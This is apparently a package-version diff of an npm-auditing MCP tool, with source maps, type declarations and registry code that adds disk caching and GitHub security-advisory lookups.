BAChE,CAAC;YACH,CAAC;YAAC,OAAO,GAAG,EAAE,CAAC;gBACb,MAAM,OAAO,GAAG,GAAG,YAAY,KAAK,CAAC,CAAC,CAAC,GAAG,CAAC,OAAO,CAAC,CAAC,CAAC,eAAe,CAAA;gBACpE,OAAO,OAAO,CAAC,GAAG,CAAC,EAAE,EAAE;oBACrB,OAAO,EAAE,CAAC,EAAE,IAAI,EAAE,MAAM,EAAE,IAAI,EAAE,UAAU,OAAO,EAAE,EAAE,CAAC;oBACtD,OAAO,EAAE,IAAI;iBACd,CAAC,CAAA;YACJ,CAAC;QACH,CAAC;QAED;YACE,mEAAmE;YACnE,IAAI,GAAG,CAAC,MAAM,CAAC,UAAU,CAAC,gBAAgB,CAAC,EAAE,CAAC;gBAC5C,OAAO,OAAO,CAAC,GAAG,CAAC,EAAE,EAAE,EAAE,CAAC,CAAA;YAC5B,CAAC;YACD,OAAO,KAAK,CAAC,GAAG,CAAC,EAAE,EAAE,CAAC,KAAK,EAAE,qBAAqB,GAAG,CAAC,MAAM,EAAE,CAAC,CAAA;IACnE,CAAC;AACH,CAAC;AAED,KAAK,UAAU,IAAI;IACjB,MAAM,EAAE,eAAe,EAAE,GAAG,MAAM,MAAM,CAAC,eAAe,CAAC,CAAA;IAEzD,MAAM,EAAE,GAAG,eAAe,CAAC,EAAE,KAAK,EAAE,OAAO,CAAC,KAAK,EAAE,CAAC,CAAA;IAEpD,IAAI,KAAK,EAAE,MAAM,IAAI,IAAI,EAAE,EAAE,CAAC;QAC5B,MAAM,OAAO,GAAG,IAAI,CAAC,IAAI,EAAE,CAAA;QAC3B,IAAI,CAAC,OAAO;YAAE,SAAQ;QAEtB,IAAI,CAAC;YACH,MAAM,GAAG,GAAG,IAAI,CAAC,KAAK,CAAC,OAAO,CAAmB,CAAA;YAEjD,mDAAmD;YACnD,IAAI,GAAG,CAAC,EAAE,KAAK,SAAS,IAAI,GAAG,CAAC,EAAE,KAAK,IAAI,EAAE,CAAC;gBAC5C,qEAAqE;gBACrE,MAAM,aAAa,CAAC,EAAE,GAAG,GAAG,EAAE,EAAE,EAAE,CAAC,EAAE,CAAC,CAAA;gBACtC,SAAQ;YACV,CAAC;YAED,MAAM,QAAQ,GAAG,MAAM,aAAa,CAAC,GAAG,CAAC,CAAA;YACzC,OAAO,CAAC,MAAM,CAAC,KAAK,CAAC,IAAI,CAAC,SAAS,CAAC,QAAQ,CAAC,GAAG,IAAI,CAAC,CAAA;QACvD,CAAC;QAAC,MAAM,CAAC;YACP,MAAM,WAAW,GAAG,KAAK,CAAC,IAAI,EAAE,CAAC,KAAK,EAAE,aAAa,CAAC,CAAA;YACtD,OAAO,CAAC,MAAM,CAAC,KAAK,CAAC,IAAI,CAAC,SAAS,CAAC,WAAW,CAAC,GAAG,IAAI,CAAC,CAAA;QAC1D,CAAC;IACH,CAAC;AACH,CAAC;AAED,IAAI,EAAE,CAAC,KAAK,CAAC,GAAG,CAAC,EAAE;IACjB,OAAO,CAAC,MAAM,CAAC,KAAK,CAAC,qBAAqB,GAAG,CAAC,OAAO,IAAI,CAAC,CAAA;IAC1D,OAAO,CAAC,IAAI,CAAC,CAAC,CAAC,CAAA;AACjB,CAAC,CAAC,CAAA"}
+{"version":3,"file":"mcp.js","sourceRoot":"","sources":["../src/mcp.ts"],"names":[],"mappings":"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"}

package/dist/registry.d.ts

@@ -1,4 +1,6 @@
-import type { FetchFn, NpmPackageData, NpmSearchResult, NpmAdvisory } from './types.js';
+import type { FetchFn, GitHubAdvisory, NpmPackageData, NpmSearchResult, NpmAdvisory } from './types.js';
+import { disableDiskCache } from './disk-cache.js';
+export { disableDiskCache };
 /** Clear the in-memory cache */
 export declare function clearCache(): void;
 /** Fetch package metadata from npm registry */
@@ -9,4 +11,6 @@ export declare function fetchDownloads(name: string, fetcher?: FetchFn): Promise
 export declare function searchPackages(keywords: string, limit?: number, fetcher?: FetchFn): Promise<NpmSearchResult>;
 /** Fetch security advisories for a package via the bulk endpoint */
 export declare function fetchAdvisories(name: string, version: string, fetcher?: FetchFn): Promise<NpmAdvisory[]>;
+/** Fetch security advisories from GitHub Advisory Database */
+export declare function fetchGitHubAdvisories(name: string, fetcher?: FetchFn): Promise<GitHubAdvisory[]>;
 //# sourceMappingURL=registry.d.ts.map

package/dist/registry.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"registry.d.ts","sourceRoot":"","sources":["../src/registry.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAEV,OAAO,EAEP,cAAc,EACd,eAAe,EACf,WAAW,EACZ,MAAM,YAAY,CAAA;AAyBnB,gCAAgC;AAChC,wBAAgB,UAAU,IAAI,IAAI,CAEjC;AAED,+CAA+C;AAC/C,wBAAsB,YAAY,CAChC,IAAI,EAAE,MAAM,EACZ,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,cAAc,GAAG,IAAI,CAAC,CAgBhC;AAED,kCAAkC;AAClC,wBAAsB,cAAc,CAClC,IAAI,EAAE,MAAM,EACZ,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,MAAM,CAAC,CAgBjB;AAED,0BAA0B;AAC1B,wBAAsB,cAAc,CAClC,QAAQ,EAAE,MAAM,EAChB,KAAK,SAAK,EACV,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,eAAe,CAAC,CAmB1B;AAED,oEAAoE;AACpE,wBAAsB,eAAe,CACnC,IAAI,EAAE,MAAM,EACZ,OAAO,EAAE,MAAM,EACf,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,WAAW,EAAE,CAAC,CAmBxB"}
+{"version":3,"file":"registry.d.ts","sourceRoot":"","sources":["../src/registry.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAEV,OAAO,EACP,cAAc,EAEd,cAAc,EACd,eAAe,EACf,WAAW,EACZ,MAAM,YAAY,CAAA;AACnB,OAAO,EAAoB,gBAAgB,EAAE,MAAM,iBAAiB,CAAA;AAEpE,OAAO,EAAE,gBAAgB,EAAE,CAAA;AAgC3B,gCAAgC;AAChC,wBAAgB,UAAU,IAAI,IAAI,CAEjC;AAED,+CAA+C;AAC/C,wBAAsB,YAAY,CAChC,IAAI,EAAE,MAAM,EACZ,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,cAAc,GAAG,IAAI,CAAC,CAgBhC;AAED,kCAAkC;AAClC,wBAAsB,cAAc,CAClC,IAAI,EAAE,MAAM,EACZ,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,MAAM,CAAC,CAgBjB;AAED,0BAA0B;AAC1B,wBAAsB,cAAc,CAClC,QAAQ,EAAE,MAAM,EAChB,KAAK,SAAK,EACV,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,eAAe,CAAC,CAmB1B;AAED,oEAAoE;AACpE,wBAAsB,eAAe,CACnC,IAAI,EAAE,MAAM,EACZ,OAAO,EAAE,MAAM,EACf,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,WAAW,EAAE,CAAC,CAmBxB;AAMD,8DAA8D;AAC9D,wBAAsB,qBAAqB,CACzC,IAAI,EAAE,MAAM,EACZ,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,cAAc,EAAE,CAAC,CAuC3B"}

package/dist/registry.js

@@ -1,21 +1,30 @@
+import { diskGet, diskSet, disableDiskCache } from './disk-cache.js';
+export { disableDiskCache };
 const REGISTRY_URL = 'https://registry.npmjs.org';
 const DOWNLOADS_URL = 'https://api.npmjs.org/downloads/point/last-week';
 const SEARCH_URL = 'https://registry.npmjs.org/-/v1/search';
 const ADVISORIES_URL = 'https://registry.npmjs.org/-/npm/v1/security/advisories/bulk';
+const GITHUB_ADVISORIES_URL = 'https://api.github.com/advisories';
 const DEFAULT_TTL = 5 * 60 * 1000; // 5 minutes
 const cache = new Map();
 function getCached(key) {
+    // Check in-memory first
     const entry = cache.get(key);
-    if (!entry)
-        return null;
-    if (Date.now() > entry.expiresAt) {
-        cache.delete(key);
-        return null;
+    if (entry) {
+        if (Date.now() > entry.expiresAt) {
+            cache.delete(key);
+        }
+        else {
+            return entry.data;
+        }
     }
-    return entry.data;
+    // Fall back to disk cache (24h TTL)
+    return diskGet(key);
 }
 function setCache(key, data, ttl = DEFAULT_TTL) {
     cache.set(key, { data, expiresAt: Date.now() + ttl });
+    // Also persist to disk for cross-session cache
+    diskSet(key, data);
 }
 /** Clear the in-memory cache */
 export function clearCache() {
@@ -106,4 +115,49 @@ export async function fetchAdvisories(name, version, fetcher = globalThis.fetch)
         return [];
     }
 }
+/** Track GitHub rate limit state */
+let githubRateLimitRemaining = 60;
+let githubRateLimitReset = 0;
+/** Fetch security advisories from GitHub Advisory Database */
+export async function fetchGitHubAdvisories(name, fetcher = globalThis.fetch) {
+    const key = `ghsa:${name}`;
+    const cached = getCached(key);
+    if (cached)
+        return cached;
+    // Skip GitHub if rate limited (reserve 5 requests as buffer)
+    if (githubRateLimitRemaining <= 5 && Date.now() / 1000 < githubRateLimitReset) {
+        return [];
+    }
+    try {
+        const params = new URLSearchParams({
+            ecosystem: 'npm',
+            affects: name,
+            per_page: '30',
+        });
+        const res = await fetcher(`${GITHUB_ADVISORIES_URL}?${params}`, {
+            headers: { 'Accept': 'application/vnd.github+json' },
+        });
+        // Track rate limit from response headers
+        const remaining = res.headers?.get?.('x-ratelimit-remaining');
+        const reset = res.headers?.get?.('x-ratelimit-reset');
+        if (remaining) {
+            const parsed = parseInt(remaining, 10);
+            if (!isNaN(parsed))
+                githubRateLimitRemaining = parsed;
+        }
+        if (reset) {
+            const parsed = parseInt(reset, 10);
+            if (!isNaN(parsed))
+                githubRateLimitReset = parsed;
+        }
+        if (!res.ok)
+            return [];
+        const data = (await res.json());
+        setCache(key, data);
+        return data;
+    }
+    catch {
+        return [];
+    }
+}
 //# sourceMappingURL=registry.js.map

package/dist/registry.js.map

@@ -1 +1 @@
-{"version":3,"file":"registry.js","sourceRoot":"","sources":["../src/registry.ts"],"names":[],"mappings":"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